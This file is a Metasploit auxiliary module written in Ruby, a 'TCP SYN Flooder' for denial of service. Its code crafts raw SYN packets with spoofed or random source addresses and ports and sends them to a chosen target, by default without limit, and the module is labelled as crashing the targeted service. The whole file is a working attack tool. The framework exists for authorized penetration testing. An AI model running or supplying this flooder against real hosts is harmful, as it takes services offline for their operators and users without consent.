1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Capture
8
  include Msf::Auxiliary::Dos
9

10
  def initialize
11
    super(
12
      'Name' => 'TCP SYN Flooder',
13
      'Description' => 'A simple TCP SYN flooder',
14
      'Author' => 'kris katterjohn',
15
      'License' => MSF_LICENSE,
16
      'Notes' => {
17
        'Stability' => [CRASH_SERVICE_DOWN],
18
        'SideEffects' => [],
19
        'Reliability' => []
20
      }
21
    )
22

23
    register_options([
24
      Opt::RPORT(80),
25
      OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
26
      OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
27
      OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
28
    ])
29

30
    deregister_options('FILTER', 'PCAPFILE')
31
  end
32

33
  def sport
34
    datastore['SPORT'].to_i.zero? ? rand(1..65535) : datastore['SPORT'].to_i
35
  end
36

37
  def rport
38
    datastore['RPORT'].to_i
39
  end
40

41
  def srchost
42
    datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
43
  end
44

45
  def run
46
    open_pcap
47

48
    sent = 0
49
    num = datastore['NUM'] || 0
50

51
    print_status("SYN flooding #{rhost}:#{rport}...")
52

53
    p = PacketFu::TCPPacket.new
54
    p.ip_saddr = srchost
55
    p.ip_daddr = rhost
56
    p.tcp_dport = rport
57
    p.tcp_flags.syn = 1
58

59
    while (num <= 0) || (sent < num)
60
      p.ip_ttl = rand(128..255)
61
      p.tcp_win = rand(1..4096)
62
      p.tcp_sport = sport
63
      p.tcp_seq = rand(0x100000000)
64
      p.recalc
65
      break unless capture_sendto(p, rhost)
66

67
      sent += 1
68
    end
69

70
    close_pcap
71
  end
72
end
73

74